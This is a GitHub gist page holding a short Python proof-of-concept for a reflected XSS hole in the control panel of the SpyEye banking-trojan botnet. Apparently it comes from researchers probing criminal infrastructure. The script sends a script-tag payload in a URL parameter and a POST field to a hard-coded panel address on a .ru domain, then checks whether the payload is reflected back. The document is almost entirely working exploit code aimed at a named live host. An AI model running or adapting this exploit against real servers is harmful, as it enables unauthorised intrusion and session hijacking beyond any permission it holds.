Skip to content

Instantly share code, notes, and snippets.

@Xyl2k
Created February 8, 2015 16:54
Show Gist options
  • Save Xyl2k/1e6ffd5e0671fbf2126a to your computer and use it in GitHub Desktop.
Save Xyl2k/1e6ffd5e0671fbf2126a to your computer and use it in GitHub Desktop.
SpyEye frmcp2 xss
# SpyEye version ? reflected XSS POC
# Xartrick
# Xylitol
import urllib
import urllib2
# Configuration ...
sPayload = '<script>alert(1);</script>'
sPanel = 'http://drookinabra.ru/adm/frmcp2/'
sURL = sPanel + 'mod_savecert.php?id=' + sPayload
# Exploitation
sPOST = {'host' : sPayload}
sData = urllib.urlencode(sPOST)
oURL = urllib2.Request(sURL, sData)
oResponse = urllib2.urlopen(oURL)
sPage = oResponse.read()
if (sPayload in sPage):
print("Exploitation works, the vulnerabily exists!")
else:
print("You are a bad hacker!")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment